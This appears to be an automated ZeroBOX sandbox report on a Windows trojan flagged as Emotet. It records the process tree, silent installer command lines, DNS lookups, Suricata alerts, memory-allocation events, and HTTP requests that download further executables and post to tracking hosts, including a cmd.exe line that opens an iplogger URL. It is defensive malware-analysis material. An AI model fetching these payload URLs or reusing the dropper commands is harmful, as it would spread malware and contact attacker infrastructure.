Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Dec. 12, 2022, 9:39 a.m.	Dec. 12, 2022, 9:43 a.m.

Size	380.7KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`8a750de9841355fb6f01c923e71303ef`
SHA256	`ecacc62f4418adaf5bb5cf2d746daf328819897be8da1b058bc0a58b962cffd3`
CRC32	`D1145955`
ssdeep	`6144:x/QiQXCMJm+ksmpk3U9jW1U4P9bkyOGBfj/WUplm6zIOYQNd28pTXdAmpCLVRZoj:pQi3Ms6m6URA3PhxlL//plmW9bTXeVh8`
Yara	Win32_Trojan_Emotet_2_Zero - Win32 Trojan Emotet IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file

CR3.exe "C:\Users\test22\AppData\Local\Temp\CR3.exe"
840
- CR3.tmp "C:\Users\test22\AppData\Local\Temp\is-E7HTF.tmp\CR3.tmp" /SL5="$30028,140518,56832,C:\Users\test22\AppData\Local\Temp\CR3.exe"
  2112
  - zizou.exe "C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\zizou.exe" /S /UID=1405
    2264
    - poweroff.exe "C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe" /VERYSILENT
      2908
      - poweroff.tmp "C:\Users\test22\AppData\Local\Temp\is-ERPDQ.tmp\poweroff.tmp" /SL5="$50024,490199,350720,C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe" /VERYSILENT
        2956
        
        Power Off.exe "C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu
        2076
    - Cixydusuno.exe "C:\Users\test22\AppData\Local\Temp\ba-b2258-594-d99be-c73a4e8edf7b0\Cixydusuno.exe"
      3000
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        2480
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:145409
        2696
    - Tenukaeqaefe.exe "C:\Users\test22\AppData\Local\Temp\12-cb453-02a-f619c-a985aaa955f37\Tenukaeqaefe.exe"
      3036
    - cmd.exe "C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1bDHA4.jpg
      932
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
        2368
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2368 CREDAT:145409
        2792
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
iplogger.com	A 148.251.234.93	148.251.234.93
www.loransheart.com	A 23.160.193.16	23.160.193.16
chainsaw-man.s3.pl-waw.scw.cloud	A 151.115.10.1 CNAME s3.pl-waw.scw.cloud	151.115.10.1
360devtracking.com	A 37.230.138.66	37.230.138.66
www.profitabletrustednetwork.com	A 173.233.137.36 A 173.233.139.164 A 192.243.61.227 A 192.243.61.225 A 173.233.137.60 A 192.243.59.12 A 192.243.59.20 A 192.243.59.13 A 173.233.137.52 A 173.233.137.44	173.233.137.52
www.google.com	A 172.217.161.36	142.250.207.100
connectini.net	A 37.230.138.123	37.230.138.123
wewewe.s3.eu-central-1.amazonaws.com	CNAME s3-r-w.eu-central-1.amazonaws.com A 52.219.171.106	52.219.171.130
google.com	A 172.217.31.14	172.217.25.174
grilloo.net	A 159.8.122.140	159.8.122.140
apps.identrust.com	CNAME a1952.dscq.akamai.net A 23.43.165.105 CNAME identrust.edgesuite.net A 23.43.165.66	23.32.56.72
droplex.s3.pl-waw.scw.cloud	A 151.115.10.1 CNAME s3.pl-waw.scw.cloud	151.115.10.1

IP Address	Status	Action
148.251.234.93	Active	Moloch
151.115.10.1	Active	Moloch
164.124.101.2	Active	Moloch
172.217.161.36	Active	Moloch
172.217.31.14	Active	Moloch
173.233.137.44	Active	Moloch
23.43.165.105	Active	Moloch
37.230.138.123	Active	Moloch
37.230.138.66	Active	Moloch
52.219.171.106	Active	Moloch
95.214.24.96	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2027865	ET INFO Observed DNS Query to .cloud TLD	Potentially Bad Traffic
TCP 192.168.56.103:49163 -> 151.115.10.1:80	2027874	ET INFO HTTP Request to Suspicious *.cloud Domain	Potentially Bad Traffic
TCP 192.168.56.103:49168 -> 52.219.171.106:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49169 -> 151.115.10.1:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49163 -> 151.115.10.1:80	2027874	ET INFO HTTP Request to Suspicious *.cloud Domain	Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 151.115.10.1:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 151.115.10.1:80 -> 192.168.56.103:49163	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.103:49205 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 37.230.138.123:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:62576 -> 164.124.101.2:53	2027865	ET INFO Observed DNS Query to .cloud TLD	Potentially Bad Traffic
TCP 148.251.234.93:443 -> 192.168.56.103:49204	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49201 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:64894 -> 164.124.101.2:53	2027865	ET INFO Observed DNS Query to .cloud TLD	Potentially Bad Traffic
TCP 192.168.56.103:49192 -> 172.217.161.36:80	2036303	ET HUNTING Terse Unencrypted Request for Google - Likely Connectivity Check	A Network Trojan was detected
TCP 192.168.56.103:49202 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49226 -> 173.233.137.44:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49196 -> 37.230.138.123:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49199 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49203 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49220 -> 37.230.138.123:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49225 -> 173.233.137.44:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 148.251.234.93:443 -> 192.168.56.103:49179	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 148.251.234.93:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49200 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.103:49168 52.219.171.106:443	C=US, O=Amazon, OU=Server CA 1B, CN=Amazon	CN=*.s3.eu-central-1.amazonaws.com	bc:92:6b:62:48:5f:c5:08:60:03:a9:1e:bc:29:58:79:d7:4b:94:fb
TLS 1.2 192.168.56.103:49169 151.115.10.1:443	C=US, O=Let's Encrypt, CN=R3	CN=s3.pl-waw.scw.cloud	13:5a:26:76:9b:02:b0:88:8d:ed:ac:89:e9:f3:d1:bd:f4:6d:ff:fd
TLS 1.2 192.168.56.103:49170 151.115.10.1:443	C=US, O=Let's Encrypt, CN=R3	CN=s3.pl-waw.scw.cloud	13:5a:26:76:9b:02:b0:88:8d:ed:ac:89:e9:f3:d1:bd:f4:6d:ff:fd
TLSv1 192.168.56.103:49166 37.230.138.123:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49
TLSv1 192.168.56.103:49226 173.233.137.44:443	C=US, O=Let's Encrypt, CN=R3	CN=profitabletrustednetwork.com	6a:48:45:b5:44:ae:75:f4:d2:b3:d4:5e:bc:2f:61:30:ec:d4:3a:99
TLSv1 192.168.56.103:49196 37.230.138.123:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49
TLSv1 192.168.56.103:49220 37.230.138.123:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49
TLSv1 192.168.56.103:49225 173.233.137.44:443	C=US, O=Let's Encrypt, CN=R3	CN=profitabletrustednetwork.com	6a:48:45:b5:44:ae:75:f4:d2:b3:d4:5e:bc:2f:61:30:ec:d4:3a:99

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Dec. 12, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 12, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 12, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 12, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 12, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 12, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (7 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 12, 2022, 9:39 a.m.			0	0
IsDebuggerPresent Dec. 12, 2022, 9:39 a.m.			0	0
IsDebuggerPresent Dec. 12, 2022, 9:39 a.m.			0	0
IsDebuggerPresent Dec. 12, 2022, 9:40 a.m.			0	0
IsDebuggerPresent Dec. 12, 2022, 9:40 a.m.			0	0
IsDebuggerPresent Dec. 12, 2022, 9:40 a.m.			0	0
IsDebuggerPresent Dec. 12, 2022, 9:40 a.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 12, 2022, 9:39 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Dec. 12, 2022, 9:40 a.m.	stacktrace: cr3+0x816a8 @ 0x4816a8 cr3+0x99c13 @ 0x499c13 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xeedface exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 1637924 registers.edi: 4523332 registers.eax: 1637924 registers.ebp: 1638004 registers.edx: 0 registers.ebx: 0 registers.esi: 2 registers.ecx: 7	1	0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (17 events)

suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.google.com/
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://connectini.net/Series/SuperNitouDisc.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/pub-nv5fyed7t8r9ykva.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/hand-h6vuy332pnrr8zq9.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/up-da-nv5fyed7t8r9ykva.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://droplex.s3.pl-waw.scw.cloud/widgets/powerOff.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/S2S/Disc/Disc.php?ezok=pwoffch2&tesla=7
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://connectini.net/Series/Conumer4Publisher.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/Series/publisher/1/KR.json
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://connectini.net/Series/Conumer2kenpachi.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/Series/configPoduct/2/goodchannel.json
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_mp3studioWW
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_file2Ww
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_PegasunWW

Performs some HTTP requests (20 events)

request	HEAD http://chainsaw-man.s3.pl-waw.scw.cloud/costa-ins/poweroff.exe
request	GET http://chainsaw-man.s3.pl-waw.scw.cloud/costa-ins/poweroff.exe
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies
request	GET http://www.google.com/
request	POST https://connectini.net/Series/SuperNitouDisc.php
request	GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe
request	GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/pub-nv5fyed7t8r9ykva.exe
request	GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/hand-h6vuy332pnrr8zq9.exe
request	GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/up-da-nv5fyed7t8r9ykva.exe
request	GET https://droplex.s3.pl-waw.scw.cloud/widgets/powerOff.exe
request	GET https://connectini.net/S2S/Disc/Disc.php?ezok=pwoffch2&tesla=7
request	POST https://connectini.net/Series/Conumer4Publisher.php
request	GET https://connectini.net/Series/publisher/1/KR.json
request	POST https://connectini.net/Series/Conumer2kenpachi.php
request	GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json
request	GET https://connectini.net/Series/configPoduct/2/goodchannel.json
request	GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_mp3studioWW
request	GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_file2Ww
request	GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_PegasunWW

Sends data using the HTTP POST Method (4 events)

request	POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies
request	POST https://connectini.net/Series/SuperNitouDisc.php
request	POST https://connectini.net/Series/Conumer4Publisher.php
request	POST https://connectini.net/Series/Conumer2kenpachi.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 806 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 40960 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 20480 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040f000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2112 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01dc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:40 a.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000065f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000710000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000008d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c8b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001f40000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001f80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f4000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e4a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e5c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f73000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f74000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93efc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f26000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
